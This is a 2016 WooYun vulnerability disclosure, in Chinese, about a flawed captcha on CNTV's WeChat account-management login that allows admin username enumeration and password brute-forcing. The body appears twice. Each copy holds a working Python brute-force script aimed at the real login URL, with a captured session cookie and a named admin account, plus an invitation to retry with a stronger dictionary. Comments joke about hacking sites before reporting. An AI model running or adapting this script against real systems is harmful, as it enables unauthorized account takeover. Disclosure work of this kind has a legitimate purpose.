当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0173681

漏洞标题:央视某重要系统设计缺陷导致可爆破(附爆破脚本)

相关厂商:中国网络电视台

漏洞作者: 齐天大圣

提交时间:2016-01-29 17:19

修复时间:2016-02-03 17:20

公开时间:2016-02-03 17:20

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-29: 细节已通知厂商并且等待厂商处理中
2016-02-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

年底了,听说要让三只搅屎棍上春晚,我说还不如让猴哥上。

详细说明:

存在漏洞的站点在
央视公众号管理平台
http://wx.cntv.cn/mp/login.html

央视.jpg


加上admin就是超级管理员后台

央视0.jpg


这个地方的验证码设计是有缺陷的,导致可以爆破用户名和密码,先来尝试爆破几个用户名
爆出的两位超级管理员用户名

央视1.jpg


爆出的三位普通管理员

央视2.jpg


普通管理员在超级管理员页面登录的时候会提示没有权限

央视5.jpg


超级管理员则会提示输错密码

央视6.jpg


密码部分是经过md5加密的

央视3.jpg


编写爆破脚本测试之

央视4.jpg


另外本平台本身也有些bug
直接访问http://wx.cntv.cn/pannel.html,也是能一窥后台全貌的

央视7.jpg


央视8.jpg


然而并没有用,只能算个bug。
爆破脚本
手里字典不够强大,没有爆破出来。
可以换强大的字典尝试一下。
需要抓包把cookie修改成你自己的,并且填入页面中显示的验证码。

# -*- coding: utf-8 -*-
import md5
import requests
def crypt( str ):
m = md5.new()
m.update(str)
return m.hexdigest()

target = "http://wx.cntv.cn/admin/login/invaild.html"
vcode = "fxg5"
cookie = 'vjuids=-6fcdfeb6.15286b22d4b.0.ab75c7f36e7b; vjlast=1453958770.1453958770.30; wdcid=30aaf6ab9c552d55; __gads=ID=36e2fcc6c3d14393:T=1453958771:S=ALNI_MYmCxw1JJB4sbqHG9hq5TWja7AtBg; cntv_mail_usr=qq3131798654; m_cntv_app=; BLOG_NEW_cntv_sid=5uu5u5; PHPSESSID=j1pd7qfam7v8u7a78u5pnku1b5'
headers = {
'Host':'wx.cntv.cn',
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7',
'Accept':'application/json, text/javascript, */*; q=0.01',
'Content-Type':'application/x-www-form-urlencoded',
'Referer':'http://wx.cntv.cn/admin/login.html',
'Cookie':cookie,
'Connection':'keep-alive'
}
dic = open('D:\dic1.txt')
for line in dic:
passwd = line.split("\n")[0]
passwd_hash = crypt( passwd )
data = {"do_login":"true",
"username":"lsz",
"password":passwd_hash,
"verifyCode":vcode
}
try:
r = requests.post( target, data = data, headers= headers )
if r.status_code == 200:
#print r.text
result = r.json()
if result["e"] == "9008":
print u'%s %s\t尝试:%s' % ( result["e"], result["m"], passwd )
else:
print u'%s %s\t尝试:%s' % ( result["e"], result["m"], passwd )
break
except Exception, e:
print str(e)

漏洞证明:

存在漏洞的站点在
央视公众号管理平台
http://wx.cntv.cn/mp/login.html

央视.jpg


加上admin就是超级管理员后台

央视0.jpg


这个地方的验证码设计是有缺陷的,导致可以爆破用户名和密码,先来尝试爆破几个用户名
爆出的两位超级管理员用户名

央视1.jpg


爆出的三位普通管理员

央视2.jpg


普通管理员在超级管理员页面登录的时候会提示没有权限

央视5.jpg


超级管理员则会提示输错密码

央视6.jpg


密码部分是经过md5加密的

央视3.jpg


编写爆破脚本测试之

央视4.jpg


另外本平台本身也有些bug
直接访问http://wx.cntv.cn/pannel.html,也是能一窥后台全貌的

央视7.jpg


央视8.jpg


然而并没有用,只能算个bug。
爆破脚本
手里字典不够强大,没有爆破出来。
可以换强大的字典尝试一下。
需要抓包把cookie修改成你自己的,并且填入页面中显示的验证码。

# -*- coding: utf-8 -*-
import md5
import requests
def crypt( str ):
m = md5.new()
m.update(str)
return m.hexdigest()

target = "http://wx.cntv.cn/admin/login/invaild.html"
vcode = "fxg5"
cookie = 'vjuids=-6fcdfeb6.15286b22d4b.0.ab75c7f36e7b; vjlast=1453958770.1453958770.30; wdcid=30aaf6ab9c552d55; __gads=ID=36e2fcc6c3d14393:T=1453958771:S=ALNI_MYmCxw1JJB4sbqHG9hq5TWja7AtBg; cntv_mail_usr=qq3131798654; m_cntv_app=; BLOG_NEW_cntv_sid=5uu5u5; PHPSESSID=j1pd7qfam7v8u7a78u5pnku1b5'
headers = {
'Host':'wx.cntv.cn',
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7',
'Accept':'application/json, text/javascript, */*; q=0.01',
'Content-Type':'application/x-www-form-urlencoded',
'Referer':'http://wx.cntv.cn/admin/login.html',
'Cookie':cookie,
'Connection':'keep-alive'
}
dic = open('D:\dic1.txt')
for line in dic:
passwd = line.split("\n")[0]
passwd_hash = crypt( passwd )
data = {"do_login":"true",
"username":"lsz",
"password":passwd_hash,
"verifyCode":vcode
}
try:
r = requests.post( target, data = data, headers= headers )
if r.status_code == 200:
#print r.text
result = r.json()
if result["e"] == "9008":
print u'%s %s\t尝试:%s' % ( result["e"], result["m"], passwd )
else:
print u'%s %s\t尝试:%s' % ( result["e"], result["m"], passwd )
break
except Exception, e:
print str(e)

修复方案:

1.重新修改验证码逻辑
2.对后台敏感页面稍微做一些限制
3.真的不考虑我猴哥吗

版权声明:转载请注明来源 齐天大圣@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-03 17:20

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-29 17:24 | king7 ( 普通白帽子 | Rank:1617 漏洞数:231 | 乱花渐欲迷人眼)

    你不要黑三小只,他们高烧200°还在坚持用一个小时的时间来跑800米...

  2. 2016-01-29 17:39 | X4car ( 实习白帽子 | Rank:31 漏洞数:12 | 瓦塔西瓦路飞的四)

    @king7 你也是四叶草啊,终于找打自己人了。等我把这堆粪舔完,要不要来一起日站。

  3. 2016-01-29 18:35 | 随风的风 ( 普通白帽子 | Rank:201 漏洞数:67 | 微信公众号:233sec 不定期分享各种漏洞思...)

    我觉得提交wooyun不如自己先玩玩啊。。。

  4. 2016-01-29 19:10 | scanf ( 核心白帽子 | Rank:1361 漏洞数:195 | 。)

    可怕楼上这么多四叶草的?